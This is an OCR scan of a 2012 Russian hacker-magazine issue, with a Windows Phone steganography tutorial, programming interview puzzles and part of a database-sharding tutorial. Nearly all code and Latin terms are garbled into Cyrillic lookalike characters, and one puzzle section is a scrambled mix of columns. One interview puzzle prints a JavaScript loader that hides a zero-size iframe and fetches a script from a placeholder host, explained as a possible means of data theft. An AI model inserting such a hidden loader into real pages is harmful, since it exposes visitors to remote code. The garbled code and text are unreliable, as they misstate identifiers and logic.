камера. Проведя по экрану, ты вернешься на начальную страницу. 
Все путем? Отлично, тогда идем дальше. 

Теперьдля реализации функциональности фотоснимка надо 
добавить два обработчика событий камеры и три — для аппарат- 
ной кнопки. В событии ОпІЧаѵідаІесіТо для камеры зарегистри- 
руй СарІигеІтадеАѵаіІаЫе и АиІоРосизСотрІеІесІ. Первое из них 
вызывается в момент, когда изображение с камеры захвачено 
и «сырые» данные готовы к обработке, а второе — когда фокус 
успешно установлен, последний обработчик нужен только для 
вывода отладочного сообщения. Чтобы привязать обработчики 
к событиям аппаратной кнопки, не нужно создавать объект, до- 
статочно воспользоваться классом СатегаВіШопз. Таким образом, 
для регистрации события полного нажатия на аппаратную кнопку 
съемки надо написать: СатегаВііиопз.ВІиіиегКеуРгеззесІ += 
ОпВиКопРиІІРгезз;. Так же оформляется привязка остальных об- 
работчиков: ВІиШегКеуРІаМРгеззесІ — вызывается в момент полу- 
нажатия, ВЬііиегКеуРеІеазесі — вызывается в момент отпускания. 
Не забудь добавить операции «отвязки» всех этих обработчиков 
в функцию ОпІ\ІаѵідаІіпдРгот. 

Опишем события для аппаратной кнопки. Когда пользователь 
нажимает ее наполовину, проверяется инициализация объек- 
та камеры. Ответ положительный — вызывается АРІ-функция 
автофокуса: туСат. РосизО;. При полном нажатии из обработчика 
вызывается метод камеры туСат. СарІигеІтадеО; для получения 
снимка. В момент отпускания аппаратной кнопки камеры вызыва- 
ется метод для отмены фокуса: туСат. СапсеІРосизО;. 

Так как наше приложение состоит из двух отдельных стра- 
ниц, важно не забыть при скрытии первоначальной страницы с 
текстовым полем сохранить его контент в файл во флеш-памяти, 
поскольку иначе данные будут утеряны. И при возврате на эту 
страницу текстовое поле будет очищено. Кроме того, в ѴѴР- 
приложениях нельзя передать значение переменной — члена 
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Рис. 3. Обработчики событий первой страницы 

одного класса (страницы) переменной — члену другого класса 
(страницы). Или, что то же самое, считать значение визуального 
компонента другой страницы. Это происходит потому, что при сме- 
не страниц для экономии ресурсов операционная система удаляет 
содержимое старой страницы. Поэтому для передачи значения 
его необходимо поместить в хранилище при скрытии предыдущей 
страницы, а при отображении новой восстановить оттуда — запи- 
сать в переменную (в нашем случае). Восстановление также надо 
проводить при возврате на страницу с меню - вывести в текстовое 
поле. Следовательно, надо добавить два обработчика событий 
в файл МаіпРаде.хатІ.сз (ОпМаѵідаІесІТо и ОпМаѵідаІіпдРгот) и 
дополнить обработчик ОпЫаѵідаІесІТо в файле РЬоІоСарІиге.хатІ. 
С5 (см. исходник) (рис. 3). 

СКРЫТИЕ ДАННЫХ 

Пришло время написать обработчик события СарІигеІтадеАѵаіІаЫе 
объекта камеры. На самом деле это краеугольный камень нашей 
программы, поскольку именно здесь мы будем скрывать сообще- 
ние. Но обо всем по порядку. Сначала оформи пустой обработчик, 
чтобы построить и протестировать билд: 

ѵоісі туСаш СарІіипеІта^еАѵаіІаЫеСоЬіесІ: зепсіег, \ 
Міспо50-Рі:.Реѵісе5.Соп1:еп1:КеасІуЕѵеп1:Аг^5 е^) { 



} 

Если все работает, как задумано, идем дальше. В параметре 
этого события передаются итоговые данные объекта РИоІоСатега, 
в том числе поток «сырых» данных, соответствующих результиру- 
ющему фото. Это как раз то, что нужно, мы можем свободно манипу- 
лировать данными каждого пикселя. Данные изображения переда- 
ются в формате Р6В, исключая альфа-канал, так как стандартными 
средствами ѴѴіпсІоѵѵз РЬопе фотография сохраняется в формате 
6Р6, который не содержит информации о канале прозрачности. В 
итоге, имеем 24-битное изображение: в каждом из трех каналов 
на пиксел по байту данных. Выбранный (во время проектирования) 



метод скрытия информации прячет данные в одном байте пиксела. 
Если бы модифицировались все компоненты пиксела, тогда даже 
невооруженному глазу были бы заметны модифицированные 
пиксели. Расположение каждого пиксела, предназначенного для 
модификации, будет выбираться по текстовому ключу-константе. 

Ее значение во время операции скрытия данных обрабатывается 
как поток байт, который определяет пространство между изменяе- 
мыми пикселями. 

Так как действия производятся в том числе над элементами 
интерфейса, код обработки изображения должен быть запущен в 
потоке 6Ш, иначе при создании определенных объектов будет воз- 
никать ошибка доступа к противоположному потоку: 

ОівраТсІіеп. Ве§іпІпѵоке(сІе1е§а1:е( ) { 

Прежде чем мы сможем работать с пикселами, необходимо пре- 
образовать поток байт к массиву. Для этого можно воспользоваться 
объектом класса ѴѴгіІеаЫеВіІтар. Тем не менее у этого класса нет 
конструктора, который в качестве параметра принимал бы поток 
данных или же не имел их совсем. Поэтому предварительно надо 
создать объект класса Віітарітаде, у которого есть перегруженный 
вариант конструктора, не принимающий параметров: Віітарітаде 
Ьі = пеѵѵ ВіІтарІтадеП;. После к этому объекту можно привязать 
поток: Ьі.5еі5оигсе(е.Ітаде5ігеат);. Теперь на основе этого объекта 
можно создать экземпляр класса ѴѴгіІеаЫеВіІтар: ѴѴгіІеаЫеВіІтар 
ѵѵЬ = пеѵѵ ѴѴгіІеаЫеВіІтар(Ьі);. В имеющемся в БіІѵегІідЫ классе 
ѴѴгіІеаЫеВіІтар есть не все нужные нам методы для работы с изо- 
бражением. Например, в нем нет метода для установки пиксела — 
БеіРіхеІ. К счастью, немецкий программист Рене Шульте разрабо- 
тал расширение этого класса — ѴѴгіІеаЫеВіІтарЕх и выложил его 
в майкрософтский опенсорс Собе РІех ( ѵѵгіІеаЫеЬіІтарех.соберІех. 
сот ). Оно добавляет не только необходимые нам функции (в частно- 
сти, ОеіРіхеІ и БеіРіхеІ), но и множество других способов рисования 
фигур: ОгаѵѵЫпе, ОгаѵѵРесІапдІе и прочие. Чтобы установить этот 
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компонент, лучше воспользоваться ІЧибеІ Мападег (см. врезку). 

В командную строку достаточно ввести команду РМ> ІпзІаІІ-Раскаде 
ѴѴгіІеаЫеВіІтарЕх. Результатом будетустановленный пакет, о чем 
тебя известит надпись. Класс имееттакое же имя, поэтому никаких 
изменений не требуется. 

Теперь объяви переменную класса Зігеат, в которой будет 
храниться поток байт скрываемого сообщения. Далее ей присва- 
ивается результат выполнения функции беібігеат (см. листинг), 
которая возвращает поток байт, полученный из переданной 
в параметре строки. В данном случае функции передается строка, 
считанная из хранилища во время загрузки страницы. Опустим 
описание проверки — она нужна, чтобы убедиться в наличии 
текста для скрытия. Если он есть, тогда с помощью все той же 
функции беібігеат получаем поток байт ключа. Его мы храним 
в константе, чтобы не вводить каждый раз. Таким образом, если 
кто-то вскроет ключ, наша система будет скомпрометирована. 

Так что в качестве самостоятельной работы можешь добавить ввод 
каждый раз уникального ключа. Дальше происходит развязка на- 
шего механизма скрытия данных. Потоки байт сообщения и ключа 
вместе с массивом байтов изображения, сохраненном в объекте 
класса ѴѴгіІеаЫеВіІппар, передаются функции НісІеТехІІпІтаде. 

Эта функция произведет скрытие сообщения в пикселах изображе- 
ния. Окунемся в нее поглубже. 

После объявления используемых переменных первым делом 
записываем в первый пиксел изображения (0, 0) длину передан- 
ного сообщения. Здесь важно обратить внимание на следующий 
элемент. После формирования значений цветовых компонентов 
происходит обращение к структуре Соіог через метод РготАгдЬ, 
который на основе переданных в параметрах байтовых значений 
цветов строит одноименную цветовую структуру. Этому мето- 
ду передаются четыре значения для четырех каналов — АР6В. 

Ноу нас есть только три значения — Р6В. Тем не менее для канала 
прозрачности можно передать его максимальное значение, то есть 
255 — абсолютно непрозрачный. Далее начинается основной цикл, 
который проходит по каждому байту сообщения и сохраняет его. 
Рассмотрим интересные детали внутренностей цикла. 

Сначала инициализируем переменные. Переменной 
сиггепЖеуВуІе присваиваем значение байта из текущего поло- 
жения потока ключа. Вместе с этим позиция в потоке передви- 
гается на байт вперед. Затем, запомнив позицию, перемещаемся 
на такую же позицию относительно конца потока. Оттуда мы 
тоже считываем байт информации. Дальше идут проверки для 
перехода на следующий пиксел: если строка завершена, то 
переходим на следующую — шаг по У, в ином случае приращение 



происходит по X — сдвигаемся вправо. После этого начинается 
ключевая часть функции — собственно скрытие байтов сообще- 
ния. По уже вычисленным координатам берем цвет пиксела. 
Посредством операции «исключающего или» на текущий байт 
сообщения воздействует байт, считанный из ключа. Далее 
вызывается функция 5еіСоІогСотропепЕ Ей передаются три па- 
раметра: по ссылке цвет пиксела и по значению номер цветового 
компонента (0-Р, 1-6, 2-В) и модифицированный на прошлом 
шаге байт. Внутри этой функции на основе номера цветового 
компонента и его нового значения вычисляется новый цвет 
пиксела с помощью ранее рассмотренной функции РготАгдЬ. 
Затем, после возврата в функцию НісІеТехІІпІтаде, происходит 
чередование номера цветового компонента в значении перемен- 
ной для будущего использования. Также цвет пиксела в ранее 
определенных координатах заменяется на цвет, который был 
вычислен в БеіСоІогСотропепІ. На этом итерация заканчивает- 
ся, и весь приведенный процесс производится над следующим 
байтом скрываемого сообщения. 

ПЛАНЫ НА БУДУЩЕЕ 

К сожалению, суровые рамки статьи не позволили нам довести 
разработку приложения до финала (редактор уже буйствует и него- 
дует по поводу того, что статья получилась на шесть полос вместо 
четырех, а главный редактор в ужасе, что мы вообще не уложились 
в одну статью). 

Тем не менее мы успели сделать довольно много — во-первых, 
достаточно интересный страничный интерфейс с передачей 
значения между страницами. Во-вторых, мы инициализировали 
фотокамеру, обработали события аппаратной кнопки, тем самым 
реализовав возможность создания фотографии. В-третьих, обра- 
тившись к науке стеганографии, мы скрыли в пикселах фотографии 
подготовленное текстовое сообщение. 

Но до законченного приложения, как и до финиша, еще 
далеко. Иными словами, нашей проге пока не достает многих 
деталей. Еще надо добавить сохранение результирующего 
изображения без потери качества и трансформации пикселей, 
поскольку в них спрятаны полезные данные. Надо реализовать 
возможность загрузки изображения и восстановления из него 
информации. Вместе с этим нужно средство для обзора части 
изолированного хранилища, отведенного для нашего прило- 
жения системой ѴѴР. Неплохой затеей также будет реализация 
отправки/получения файла-картинки. Но все это мы сможем 
обсудить и закодить только в следующем номере. Поэтому оста- 
вайся на связи! □С 



ЫІІ6ЕТ МАЫА6ЕР 



При работе над проектом нам понадобятся дополнительные компоненты. Для их ком- 
фортной установки лучше воспользоваться расширением для студии — І^ибе* Мападег. 
Оно позволяет легко устанавливать, удалять и обновлять .МЕТ-тулзы и библиотеки 
в ѴізиаІ Зіисііо. При установке компонента с помощью ІЧибе* он автоматически скачива- 
ет/копирует необходимые файлы, размещая их в нужных каталогах решения, а также 
прописывает их в нужных местах. Во время удаления І^ибе* выполняет полностью об- 
ратный процесс, попутно очищая конфигурационный файл решения. 

Чтобы установить ІМибеІ Мападег, открой Ехіепзіоп Мападег (Тооіз — > Ехіепзіоп Мападег), 
в левой части открывшегося окна выбери Опііпе баііегу, а в поле поиска набери пидеЕ 
После этого в центральной части окна выстроится список, в котором выбери самую 
верхнюю строчку (ІЧибе* Мападег Раскаде) и нажми рядом с ней кнопку «йоѵѵпіоасі». 

Результат не заставит себя долго ждать, и в итоге у тебя будет установлена соответ- 
ствующая тулза (рис. 4). Чтобы изменения вступили в силу, надо перезапустить студию, 
и у тебя добавится менеджер ІМибе*, подобный Ехіепзіоп Мападег, только с появлением 
нового ІМибеІ-репозитория и инструмента командной строки для установки расширений. 




Рис. 4. ЫиСеІ Мападег установлен 



ѵтш 

ѵѵѵѵѵѵ.сосіеріех. 

со — МІСГОБОК 
Ореп Боигсе — 
место, где можно 
найти массу тулз 
и исходников для 
программирования 
под платформы 
отМісгобоК. 



ЕШ 

На диске находится 
начальная версия 
приложения РНоІо- 
Макег, разработкой 
экземпляра которого 
мы занимались 
на протяжении 
статьи. 
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кодинг 



Павел Александрович (іѵіпзісіе.ЫодзроІ.сот) 




Надо ставить себе задачи выше своих сил: во-первых, 
потому, что их все равно никогда не знаешь, а во-вторых, 
потому, что силы и появляются по мере выполнения 
недостижимой задачи. 



Борис Пастернак 



Задачи 
на собеседованиях 



ПОДБОРКА ИНТЕРЕСНЫХ 
ЗАДАНИЙ, КОТОРЫЕ ДАЮТ 
НА СОБЕСЕДОВАНИЯХ 



Задача № 1 

УСЛОВИЕ 

Что вы ведет данный скрипт? Объясните почему. 
СІЭ55 А: 

сіе-р іпіі (зеИД ѵ): 

зеІІД д_ = зеі Рѵ) 



сіе-р ^е-руаКзеИД : 
ѵ = зеі-р. сі.рорО 
ѵіеісі у 



с1а55 В(А): 

сіе-р §еіѵа1(5е1-р) : 

■Рог ѵ_іп зеі-р. я : 

ѵіеісі ѵ 



Ь = В( 1 яыегіу 1 ) 

ргіпі [с -Рог с іп Ь.§еіѵа1()] 

РЕШЕНИЕ 

Судя по синтаксису инструкции ргіпі, имелось в виду использова- 
ние интерпретатора РуіЬоп второй версии, поэтому и будем юзать 
его. При запуске этого скрипта получаем ошибку: 

ТгасеЬаск (гпові гесепі саіі 1а5і) : 

Рііе "ц1.ру" л Ііпе 15,^.п <тосІи1е> 

ргіпі: [с -Рог с іп Ь.§еіѵа1()] 

Рііе "ді.ру". Ііпе 11. іп §еіѵа! 

АіігіЬиіеЕггог: В іпзіапсе баз по аіігіЬиіе ’_В я'. 

Ошибка говорит нам, что у экземпляра В нет атрибута ’_В я'. 

Этого атрибута в коде явно не имеется, он взялся путем преоб- 
разования так называемого частного атрибута я в строчке «Рог ѵ 

іп зеІГ я»- Но и сам частный атрибут не был определен в классе 



В, а также не унаследовался из класса А, из-за чего и возникла 
ошибка. Другое дело, если бы атрибут был не частным, а обычным, 
в таком случае скрипт отработал бы без претензий. 

Задача № 2 

УСЛОВИЕ 

Что и зачем делает следующий код и как его можно улучшить? 

<5СГІрІ> 

(■Рипс1:іоп(иг1) { 

ѵаг і-Ргате = сіоситепі . сгеаіеЕ1етепі( ' і-Ргате ' ) ; 

(і-Ргате. -РгатеЕІетепі | | Д/Ргате) . зіуіе . сззТехі = 

"місіііі: 0; Иеі^Ы: : 0; Ьогсіег: 0"; 
ѵаг іаг^еі = сіоситепі .^еіЕІетепізВѵТа^ІМатеР 1 зсгірі 1 ) ; 
іаг^еі = Ііаг^еі: [Ііаг^еі: . Іеп^ІгИ - 1]; 
іаг§еі.рагепіІМосІе.іп5егіВе-Роге( і-Ргате. іаг§еі) ; 
ѵаг сі = іігате.сопіепіілііпсіом. сіоситепі; 
сІ.ореп() .мгііе( ' < Ьосіу 0010301="'+ \ 

’ѵаг _]5 = сіоситепі . сгеаіеЕ1етепі(\ ' 5сгірі \ ' ) ; ' + 

5 . зге = ' "+ игі +" ' ; "+ 

' сіоситепі . Ьосіу . аррепсІСІііІсІ ( і б ; 
сІ.сІозеО; 

' Іііір: //зоте. ги/зсгірі. іб 1 ; 

</5сгірі> 

РЕШЕНИЕ 

В данном скрипте мы лицезрим функцию с одним параметром игі, 
который в нашем случае определяется как 'Шр://50те.ги/5спр1. 
Із'. В самой же функции происходит следующее: в документе 
создается элемент іітате с нулевыми размерами и нулевой же 
границей. Далее в этот фрейм записывается следующий код: 

< Ьосіу оп!оасІ="ѵаг іб = сіоситепі. сгеаіеЕІетепі ( ' Бсгірі' ); \ 
іб.бгс = ' Ніір://5оте.ги/5сгірі.І5' ; 
сіоситепі. Ьосіу. аррепсІСІііІсНД'Б) ; "> 



по 



ХАКЕР 11 /166/2012 





Задачи на собеседованиях 



Этот код при загрузке страницы выполняет скрипт, рас- 
положенный по адресу бир://5оте.ги/5сгірС)5. Смысл загрузки 
скрипта со стороннего хоста может варьироваться. Скрипт может 
использоваться для легитимного сбора данных (статистика, 
анализ, тестирование) или же злонамеренных действий (кража 
идентификационных данных пользователя, выполнение действий 
от его имени и так далее). Смысл использования Нтате нулевого 
размера, видимо, заключается в том, чтобы скрыть информацию, 
выдаваемую скриптом. В случае если скрипт на стороннем хосте 
не выводит данных на экран, можно обойтись и без использования 
фрейма. 

Задача № 3 

УСЛОВИЕ 

У вас есть два ведра емкостью 3 литра и 5 литров и неограничен- 
ный запас воды. Как можно отмерить точно 4 литра воды? 

РЕШЕНИЕ 

Очевидно, чтобы отмерить нужное количество воды, надо произве- 
сти некие манипуляции с обоими ведрами. То есть «на глаз» отлить 

1 литр воды из полного пятилитрового ведра не прокатит. При- 
кинем, какие действия мы можем совершать с ведрами. Мы можем 
складывать воду в ведрах. Для решения нам было бы необходимо 
иметь в обоих ведрах по 2 литра воды или же 1 и 3 литра воды соот- 
ветственно. Но похоже, сделать это у нас не получится. 

Но если сложение нам не поможет, можно попробовать исполь- 
зовать вычитание! Нужно налить 5 литров воды в большое ведро, 
а потом аккуратно перелить воду в 3-литровое ведро, до тех пор 
пока оно не наполнится. Тогда в 5-литровом ведре останется ровно 

2 литра воды. Теперь, чтобы продвинуться в решении задачи, нам 
потребуется вылить всю воду из 3-литрового ведра и перелить туда 



2 литра из 5-литрового. Теперь нужно снова наполнить 5-литровое 
ведро до краев и постепенно переливать из него воду в 3-литровое 
до тех пор, пока оно не заполнится до краев. Таким образом полу- 
чаем 4 литра воды в 5-литровом ведре. 

Альтернативное решение (для него потребуется переливать 
воду на один раз больше) — это наполнить 3-литровое ведро 
водой и перелить из него воду в 5-литровое ведро. Потом про- 
делать это еще один раз и снова перелить воду в 5-литровое ве- 
дро, пока оно не заполнится до краев (тогда в 3-литровом ведре 
останется 1 литр воды). Теперь нужно вылить воду из 5-литро- 
вого ведра. А потом перелить 1 литр воды в пустое 5-литровое 
ведро. Затем понадобится снова наполнить 3-литровое ведро 
и перелить из него воду в 5-литровое ведро, после чего в нем 
окажется 4 литра воды. 

Задача № 4 

УСЛОВИЕ 

Почему банки для пива сужаются вверху и внизу? 

РЕШЕНИЕ 

Сделаем небольшой экскурс в историю. Издревле человек думал, 
на чем можно сэкономить. Так и банки стали сужать изначально 
из-за экономии материала. Когда-то банки для пива и прочих на- 
питков были стальными и тяжелыми, поэтому такая конструкция 
приносила существенную экономию. Позже компании перешли 
на тонкие алюминиевые банки. И тут сужения сыграли еще одну 
важную роль — они сделали банки более прочными. 

Важно заметить, что самая толстая часть алюминиевой банки — 
это ее верх. Поэтому производитель заинтересован в том, чтобы 
уменьшить его диаметр. Соответственно, нужно уменьшить и низ, 
чтобы банки можно было ставить друг на друга. ПЕ 





В СЛЕДУЮЩЕМ ВЫПУСКЕ 


1. 


Напишите Зігіпд- класс, который бы имел: 
конструктор по умолчанию; 
конструктор копирования; 


( І5_1е1:1:ег( 5 [ і -1] ) апсі 


4) 


все веселые лягушата — зеленые; 

все лягушата — грустные; 

если лягушонок зеленый, то он плавает. 


1) 


І5_1е1:1:ег( і+1 ) апсі (сбаг іб 1 - 1 


5) 


2) 


ог сбаг І5 1 \ 1 1 ) ) : 


6) 


3) 


деструктор; 


VI += 1 




4) 


оператор сравнения (аналог зігст ре- 


і-р сбаг == 1 \п 1 : 


Какие из этих утверждений верны? 


5) 


конструктор, принимающий параметром 


1 += 1 






6) 


массив символов; 
зігеат « оператор. 


геііигп 1 %сі\1=%сі\1=%сі\п 1 % (1. ы. с) 
і-р пате == " таіп 


4. 


Пять пиратов на острове должны разде- 
лить между собой сотню золотых монет. 




ітрогі сІосІіеБІі 




Они делят свою добычу та к: старший пират 


2. 


Дан код: 


сіосіеві! . іевіітосі ( ) 




предлагает, как делить добычу, а по- 


#1 


/изг/Ьіп/руІібоп 


Попробуйте угадать, что именно он должен 




том каждый голосует, соглашаясь с его 
предложением или нет. Если по меньшей 






делать. Найдите в нем максимальное коли- 




мере половина пиратов проголосует«за», 


сіе-р І5 ІеІіІіегСсбаг') : 


чество ошибок, неаккуратностей и просто 
неизящностей. Подправьте имеющийся код 
до удовлетворительного, по вашему мнению, 




они поделят монеты так, как предложил 
старший пират, если же нет — он и убивают 
старшего пирата и начина ют все сначала. 




ІеІіІіегБ = 1 аЬссІе-Р^ІііікІтпордгБІіи \ 
ѵѵіх ут.' . вр1і1і(І\Іопе) 






ІТ зііг(сбаг) . 1омег( ) іп ІеІіІіегБ: 

геііигп Тгие 


состояния. 




Самый старший пират (из тех, кто выжил) 
предлагает новый план, за него голосуют 




еізе: геііигп Раізе 


3. Если лягушонок зеленый, то он веселый. 




по тем же правилам, а потом или делят 






Если лягушонок грустный, то он сидит на 




добычу, или убивают старшего пирата. Так 


сіе-р мс ( 5 ) : 


берегу. Все лягушата либо зеленые, либо 




продолжается до тех пор, пока какой-то 




1 = ы = с = 0 


пестренькие. Если лягушонок пестренький, 




план не будет принят. Допустим, вы — стар- 




■Рог і іп гап§е(1еп(з) ) : 


то он плавает в воде. Тогда обязательно: 




ший пират. Как вы предложите разделить 




сбаг = 5 [ і ] 


1) все лягушата плавают в воде; 




добычу? (Все другие пираты — жадные, 




с += 1 


2) на берегу только грустные лягушата; 




мыслят очень логично, и все они хотят 




і-р поі: ІБІеііег (сбаг) апсі по! \ 


3) вселягушата — веселые; 




жить.) 
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УРОК» 



Большая часть информации, 
опубликованная по теме высоких нагрузок 
в интернете, представляетсобой всего 
лишь описания технических характеристик 
крупныхсистем. Мы же попробуем изложить 
принципы, по которым строятся архитектуры 
самых передовых и самых посещаемых 
интернет-проектов нашего времени. 



Каждый программ ист хочет стать лучшим, 
получать все более интересные и сложные 
задачи и решать их все более эффективными 
способами. В мире интернет-разработок 
к та ким задачам можно отнести те, 
с которыми сталкиваются разработчики 
в ысокона груженных систем. 



УЧЕБНИК 
ПО ВЫСОКИМ 
РУЗКАМ 
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БАЗЫ ДАННЫХ 



ПОСЛЕДНИЙ ПУНКТ ОБЯЗАТЕЛЬНОЙ ПРОГРАММЫ 
Если твой сайт — это не домашняя страничка, то тебе нужно 
где-тохранить данные. Рано или поздно выясняется, что твоя 
СУБД перестает с этим справляться. Какие существуют под- 
ходы к масштабированию базы данных? 

Подходов примерно столько же, сколько и для масштабиро- 
вания фронтендов и бэкендов, но ключевая мысль, с которой 
мы начнем, одна. Ты должен исследовать предметную область, 
потоки данных (подробно мы говорили об этом в прошлом уро- 
ке) и на основе результата этого исследования уже принимать 
решения о том, какие из видов масштабирования баз данных 
тебе подходят, а какие нет. 

Общего решения здесь не существует. Подходит тебе 
синхронная репликация или нет? Подходит тазіег-тазіег 
или нет? Можешь ли ты поставить много баз данных и разбить 
данные между большим количеством экземпляров? Все это 
зависит от конкретного приложения, от твоего пользователя 
итого, какты хочешь показывать ему данные. 

Чтобы говоритьо конкретныхрешениях, нужно научиться 
анализировать предметную область своих данных. Для базы 
данных нужно определить модель представления данных, 
язык доступа к данным, на котором программист будете ней 
общаться. Эту работу важно проделать на самом раннем этапе, 
хотя бы потому, что это напрямую влияетна выбор СУБД. 



РАЗЛИЧНЫЕ ТИПЫ БАЗ ДАННЫХ 

Для того чтобы лучше понимать, как нам масштабировать базу 
данных, вспомним, какие, собственно, СУБД у нас бывают. Если 
взять классификацию по используемой модели представления 
данных, то получится четыре группы, представленные на слайде. 

Какие здесь сейчас на правления, тенденции? В принципе, 
мы немного откатились назад, лет на тридцать. Мы сейчас заново 
проходим графовые базы данных, сетевые базы данных, иерархи- 
ческие модели. 

Итак, теоретически выборСУБД выглядиттак: изучаете пред- 
метную область и определяете наиболее подходящую модель 
представления своих да иных. На основе этого выбираете опти- 
мальную для себя систему. 

Это правильно, но наделе, в реальной разработке (и это пра- 
вило относится ко всем сложным проектам) предпочтение нужно 
отдавать тем инструментам, которые знают ваши главные специ- 
а л исты. Тем не менее это не отменяет того, что специализирован- 
ные решения можно при менять для отдельных типов хранимых 
данных — в зависимости от их характера. 

В данный момент для веба есть базы данных общего назначе- 
ния. Это МуЗОБи Роз^дгеЗОБ. Если рассматривать еще и специ- 
ализированные решения, то список получится на 30-40 позиций. 
Это и Мопдо, и Ресііз, и тотже Мео4і. Однако в общем случае для 
основных вашихданных вам нужентолько МуЗОБили РозБд геЗОБ. 

Почему? База данных — это нетолькото, что вы видите. Это 
еще и экосистема вокругэтого продукта, которая и заставляетего 
работать, расти и развиваться. Поясним на примере, почемуэто 
важно. 

Допустим, вам хочется сделать полностью автоматический 
шардинг. Вы смотрите на автошардинг, сделанный в МопдойВ, 
вам он нравится. Какие с этим могут возникнуть проблем ы? Точно 
та кие же проблемы, какие могут возникнуть с любой базой. У вас 
растетнагрузка, растетколичество данных. МопдоОВ начинает, 
грубо говоря, тупить. И вот тут встает главный вопрос — каки где 



придется решатьтакие проблемы? 
Это необходимоучитыватьеще на 
этапе выбора СУБД. 

Решение таких проблем упи- 
рается в развитостьэкосистемы 
вокругвыбранного продукта. Есть 
ли сообщество, естьли развитие 
продукта, естьли кто-нибудь, 
комуя могу послатьсообщениеоб 
ошибке, или я использую СУБД на 
свой страх и риск? Именно поэтому 
лучше пользоваться более по- 
пулярными продуктами схорошей 
поддержкой. 

ТЮНИНГ ЗАПРОСОВ 

Тюнинг запросов и оптимизация 
базы данных вообще — отдельная 
большая областьзнаний. Кратко 
перечислим основные направле- 
ния, в которых можно проводить 
исследование. 

Первая область связана с осо- 
бенностями конкретного сервера 
базы данных, с его архитектурой. 
Сюда входятте буферы, кеши, кото- 
рые используетсервер, механизм 
открытия/закрытиятаблиц, раз- 
личные особенности итакдалее. 
Какправило, всеэти параметры 
настраиваются. 

Почемуэтим нужнозаниматься? 
Приведем пример — настройки по 
умолчанию для СУБД РозБдгеЗОБ 
рассчитаны на работу всего лишь 
с несколькими мегабайтами памя- 
ти — они крайне неэффективны. 



Отсюда следует, что настраивать 
базы данных необходимо. 

Второе направление — особен- 
ности интерпретации и оптимиза- 
ции ЗОБ-запросов, которые при- 
меняются в данном ЗОБ-сервере. 
Изучив этутему, можнозначительно 
оптимизироватьзапросы про- 
граммного обеспечения к базе 
данных. Нередкоскоростьобра- 
ботки многократноувеличивается 
от введения одного небольшого 
индекса. 

Также стоит обратить внимание 
на особенности операций с базой 
данных в общем: чем отличаются 
операции выборки от операций 
вставки и какие конкретно физиче- 
ские действия придется совершать 
серверу базы данных при вы- 
полнении тех или иных запросов. 

Это — отдельная большая тема для 
разговора. 

Третья плоскость, в которой 
стоит искать сп особы ускорить 
работу базы данных, — структура 
базы данных, структура конкретных 
таблиц, индексирование и другие 
подобные вопросы. 

Мы же поговорим только об од- 
ном — о том, какие запросы можно 
использоватьв высоконагружен- 
ной системе, а какие нет. 

Мы должны использовать все 
те же подходы, о которых говорили 
на предыдущихуроках, — зИаге 
поБМпд и зІіаЫезз. Подход очень 



Типы баз данных 

• Реляционная модель: данные в базе данных 
представляют собой набор отношений; 

• Иерархическая модель: база данных состоит 
из объектов с указанием отношений 
родитель о ребенок; 

• Сетевая модель: база данных со структурой в виде 
графа; 

• Объектно-ориентированная модель: база данных, 
в которой данные представлены в виде моделей 
объектов 
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АКАДЕМИЯ 



ОТ АВТОРОВ 

Основным направлением деятельности нашей компании 
является решение проблем, связанныхс высокой нагрузкой, 
консультирование, проектирование масштабируемыхархи- 
тектур, проведение нагрузочныхтестирований и оптимизация 
сайтов. В число нашихклиентов входят инвесторы из России и со 
всего мира, а также проекты «ВКонтакте», «Эльдорадо», «Им- 
хонет», РІіоІозідМ.ги и другие. Во время консультаций мы часто 
сталкиваемся с тем, что многие не знают самых основ — что такое 
масштабирование и каким оно бывает, какие инструменты и для 
чего используются. Эта публикация продолжаетсерию статей 
«Учебникпо высоким нагрузкам». Вэтихстатьяхмы постараем- 
ся последовательно рассказать обо всех инструментах, которые 
используются при построении архитектуры высоконагруженных 
систем. 



простой — представь сразу, что твои таблицы расположены йена 
одном, а на десяти серверах. Что они разрезаны, самые старые но- 
вости лежат на одном сервере, а новые на другом. Далее мы будем 
подробно говорить о механизмах подобного разделения. Но сей- 
час надо представить, что та кое разделение уже произошло. 

Теперь ответь на такой вопрос — как ты будешь выполнять 
Іоіп'ы изтаблиц, расположенных на разныхфизическихсерверах? 
Правильный ответ — вручную. Работа с базой данных в высокона- 
груженном проекте предполагает простые легкие конечные за- 
п росы. С заданием границ выборки, максимальным количеством 
извлекаемых элементов. Минимальное количество индексов, 
только самое необходимое, ведь индексы ускоряют выборки, но 
замедляютобновления БД. 

Не рекомендуется использовать множество приятных вну- 
тренних механизмов СУБД. Объединения, пересечения — все 
это нужно делать в памяти бэкенда. Нужно сделать щіп для двух 
таблиц? Сделай два отдельныхзапроса и перемножь результат 
в памяти. Не используй хранимые процедуры — как они будут 
работать, если исходные данные для нихокажутся на разных 
серверах? 

Следованиеэтим простым рекомендациям, можетбыть, и не- 
сколько замедлит обработку страниц, зато сделает ее возможной, 
когда твой сайт вырастет. 

ШАРДИНГ 

Итак, ты смоделировал предметную область. Так или иначе, 
основнаятехника, которая используется при масштабировании 
СУБД, — это шардинг. 

Основной принцип простой. У вас есть сто миллионов пользо- 
вателей в вашей социальной сети, чате или чем-то еще и десять 
машин. Всю информацию, относящуюся к первым десяти миллио- 
нам, храните на одной машине, ко вторым десяти миллионам — на 
второй машине и та к да л ее. Шардинг — это разбиение, нарезка 
ваш их да иных по машинам. 

Ключевым вопросомтутявляется принцип шардинга. По 
какому критерию разбивать данные? По пользователям, по ком- 
ментариям, по товарам, по каталогу, по категориям товаров? Как 
выбрать принцип разбиения — это отдельный большой вопрос. 
Нужно анализировать приложение и его бизнес-логику. Главный 
принцип — данные должны быть максимально связаны в одном 
шарде и минимально связаны между шарда ми. 

Шардинг — это некий компромисс между масштабирова- 
нием и удобством доступа, удобством аналитики. При любом 
шардинге таких правил, которое мы привели выше, (первые 
десять, вторые десять, третьи десять], множество. Это называ- 
ется принципом построения шардинга. Когда строится такое 
разбиение, нужно учесть множество факторов, но главное — это 
твои данные. 



Модель предметной области 

На основе модели можно выбратьтип хранилища для 
каждой из сущностей. 




Шардинг 

Базовый принцип: те данные, которые в дальнейшем 
потребуются вместе, также должны храниться вместе. 

Примеры: 

1. Пользователи 

2. Посты в сообществах 

3. Блоги 

Принципы разбиения данных на шарды: 

1. Центральный диспетчер, знающий, что где лежит 

2. Хеш-функция, по ключу вычисляющая шард 

3. Хеш-функция, по ключу вычисляющая виртуальный шард, 
таблица соответствий виртуальных шардов реальным. 



Например, утебятакая структу- 
ра, что данныетолькодобавляются, 
никогда неудаляются. Наиболее 
простым способом для этого будет 
